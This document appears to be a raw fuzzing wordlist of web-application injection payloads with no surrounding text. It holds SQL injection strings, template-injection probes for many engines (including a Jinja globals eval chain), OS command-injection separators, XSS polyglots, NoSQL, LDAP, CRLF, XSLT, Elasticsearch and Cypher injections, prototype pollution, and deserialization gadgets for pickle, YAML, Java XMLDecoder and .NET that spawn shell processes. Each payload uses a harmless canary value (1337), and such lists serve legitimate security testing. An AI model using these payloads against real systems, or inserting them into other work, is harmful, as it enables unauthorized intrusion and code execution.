'UNION SELECT 7*191--/*'UNION SELECT 7*191,7*191--*/"UNION SELECT 7*191,7*191,7*191--
')UNION SELECT 7*191,NULL,NULL,NULL--/*')UNION SELECT 7*191,NULL--*/")UNION SELECT 7*191--
*/UNION SELECT 7*191--/*'UNION ALL SELECT 7*191--*/"UNION SELECT 7*191--
{{7*191}}${7*191}<%= 7*191 %>${{7*191}}#{7*191}#set($x=7*191)$x[=7*191]@(7*191)[[${7*191}]]
{{7*'191'}}${7*191}#{7*191}<%= 7*191 %>${{7*191}}{% set x=7*191 %}{{x}}[#assign x=7*191]${x}
{{7*191}}${7*191}{{=7*191}}<%=7*191%>#{7*191}${{7*191}}${T(java.lang.Math).abs(1337)}
;echo $((7*191)) #'|expr 7 \* 191|"$(echo $((7*191)))`expr 7 \* 191`
&set /a 7*191&;echo $((7*191));'|python3 -c "print(7*191)"|`echo $((7*191))`
7*191
eval('7*191')
(7*191)
int(1337.0)
abs(-1337)
'UNION SELECT 7*191--
'UNION SELECT 7*191#
"UNION SELECT 7*191--
)UNION SELECT 7*191--
'))UNION SELECT 7*191--
'UNION SELECT 7*191,NULL--
'UNION SELECT NULL,7*191--
"UNION SELECT 7*191,NULL--
'UNION SELECT 7*191,NULL,NULL--
'UNION SELECT NULL,7*191,NULL--
'UNION SELECT NULL,NULL,7*191--
'UNION SELECT 7*191,NULL,NULL,NULL--
'UNION SELECT NULL,7*191,NULL,NULL--
'UNION SELECT NULL,NULL,7*191,NULL--
'UNION SELECT NULL,NULL,NULL,7*191--
'UNION SELECT 7*191,NULL,NULL,NULL,NULL--
'UNION SELECT NULL,7*191,NULL,NULL,NULL--
'UNION SELECT 7*191,NULL,NULL,NULL,NULL,NULL--
'UNION SELECT NULL,7*191,NULL,NULL,NULL,NULL--
'AND 1=(SELECT 7*191)--
"AND 1=(SELECT 7*191)--
')AND 1=(SELECT 7*191)--
'OR 7*191=1337--
"OR 7*191=1337--
')OR 7*191=1337--
'AND 7*191=1337 AND '1'='1
"AND 7*191=1337 AND "1"="1
')AND 7*191=1337 AND ('1'='1
'))AND 7*191=1337 AND (('1'='1
*/AND 7*191=1337--
'UNION ALL SELECT 7331/1--
'UNION ALL SELECT 7331/1,NULL--
'UNION ALL SELECT NULL,7331/1--
{{7*191}}
${7*191}
<%= 7*191 %>
${{7*191}}
{{7*191}}${7*191}<%= 7*191 %>${{7*191}}#{7*191}
<#assign x=7*191>${x}
${T(java.lang.Math).addExact(1330,7)}
{{7*191}}//
'}}{{7*191}}//
"}}{{7*191}}//
}}{{7*191}}
{{7*191}}{{7*191}}
${7*191}${{7*191}}
<%= 7 * 191 %>
{{(7)*191}}
${{(7)*(191)}}
{{7*191|safe}}
{%set x=7*191%}{{x}}
${(7*191)?c}
{{=7*191}}
{{7*191}}${{7*191}}<%= 7*191 %>#{7*191}${7*191}
{{config.__class__.__init__.__globals__['__builtins__']['eval']('7*191')}}
${(7*191)}
<%=7*191%>
{{{7*191}}}
{{7*191}}{%comment%}{%endcomment%}
a]}}{{7*191}}
{{7*191}}/*
*/{{7*191}}
<%= (7)*(191) %>
${(7)*(191)}
${{7*191}}//
a]${7*191}
{{7*191}}${{<%[%'7*191}}%\
{{range.Repeat 1337}}A{{end}}
;expr 7 \* 191
;echo $((7*191))
|expr 7 \* 191
|echo $((7*191))
||echo $((7*191))
&&echo $((7*191))
$(echo $((7*191)))
`expr 7 \* 191`
`echo $((7*191))`
;echo $((7*191))#'`echo $((7*191))`"
;python3 -c "print(7*191)"
;python -c "print(7*191)"
;perl -e "print 7*191"
;ruby -e "puts 7*191"
;node -e "console.log(7*191)"
& set /a 7*191
& powershell -c "7*191"
;echo $((7331/1*1))
|echo $((7331-0))
;printf '%d' $((7*191))
;awk 'BEGIN{print 7*191}'
;bc <<< "7*191"
${IFS};echo${IFS}$((7*191))
eval("7*191")
7*191;
console.log(7*191)
echo 7*191;
puts 7*191
Math.abs(-1337)
-1337.abs
__import__("math").factorial(0)+1336
parseInt("1337")
intval("1337")
Integer("1337")
(1337).to_s.to_i
7331-5994
(function(){return 7*191})()
new GroovyShell().evaluate('7*191')
"${7*191}"
"'`><script>alert(1337)</script>
"'`><img src=x onerror=alert(1337)>
"'`><svg/onload=alert(1337)>
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html " onmouseover=/*&lt;svg/*/onload=alert(1337)//>
-->'"/></sCript><deTailS open x=">" ontoggle=(alert)(1337)>
"><img src=x onerror=alert(1337)>
'><img src=x onerror=alert(1337)>
"><svg onload=alert(1337)>
'><svg onload=alert(1337)>
`><svg onload=alert(1337)>
</script><svg onload=alert(1337)>
</title><svg onload=alert(1337)>
</textarea><svg onload=alert(1337)>
</style><svg onload=alert(1337)>
" autofocus onfocus=alert(1337) x="
' autofocus onfocus=alert(1337) x='
" onclick=alert(1337) "
' onclick=alert(1337) '
javascript:alert(1337)
javascript:alert(1337)//
{"$expr":{"$literal":1337}}
[$where]=return 7*191
true, $where: 'return 7*191'
%{7*191}
${T(java.lang.Math).abs(-1337)}
#{T(java.lang.Math).abs(-1337)}
${7*191}${7*191}
{"__proto__":{"polluted":"1337"}}
{"constructor":{"prototype":{"polluted":"1337"}}}
{"__proto__":{"toString":"1337"}}
{"__proto__":{"valueOf":"1337"}}
{"__proto__":{"1337":"polluted"}}
%0d%0aInjected-Header:1337
%0d%0aX-Injected:1337
\r\nInjected:1337
%E5%98%8A%E5%98%8DInjected:1337
%0aInjected:1337
%0dInjected:1337
1337%0d%0aInjected:true
1337%00%0d%0aInjected:true
*)(uid=1337)(&(objectClass=*
1337)(|(objectClass=*
*)(cn=1337)(|
*)(|(uid=1337)(objectClass=*
*)(description=1337)(&(cn=*
*)(uid=1337)(cn=*
<xsl:value-of select="7*191"/>
<xsl:value-of select="1337"/>
<xsl:value-of select="string(7*191)"/>
<xsl:value-of select="2674 div 2"/>
<xsl:value-of select="1338 - 1"/>
<?xml version="1.0"?><xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"><xsl:template match="/"><result><xsl:value-of select="7*191"/></result></xsl:template></xsl:stylesheet>
{"script_fields":{"x":{"script":"7*191"}}}
{"script_fields":{"x":{"script":{"source":"return 7*191"}}}}
{"query":{"script":{"script":{"source":"doc['id'].value == 7*191"}}}}
{"aggs":{"x":{"sum":{"script":"7*191"}}}}
{"aggs":{"x":{"bucket_script":{"buckets_path":{},"script":"7*191"}}}}
{"query":{"function_score":{"script_score":{"script":"7*191"}}}}
' RETURN 7*191 AS x //
') RETURN 7*191 AS x //
' OR 1=1 RETURN 7*191 //
') OR 1=1 RETURN toInteger(7*191) AS x //
Y3N1YnByb2Nlc3MKY2hlY2tfb3V0cHV0CihTJ2VjaG8gMTMzNycKSTAxCnRSLg==
!!python/object/apply:subprocess.check_output [["echo","1337"]]
{"py/reduce":[{"py/function":"subprocess.check_output"},{"py/tuple":[["echo","1337"]]}]}
<java version="1.8.0" class="java.beans.XMLDecoder"><object class="java.lang.ProcessBuilder"><array class="java.lang.String" length="3"><void index="0"><string>/bin/sh</string></void><void index="1"><string>-c</string></void><void index="2"><string>echo 1337</string></void></array><void method="start"/></object></java>
{"$type":"System.Windows.Data.ObjectDataProvider, PresentationFramework","MethodName":"Start","ObjectInstance":{"$type":"System.Diagnostics.Process, System","StartInfo":{"$type":"System.Diagnostics.ProcessStartInfo, System","FileName":"cmd","Arguments":"/c echo 1337"}}}
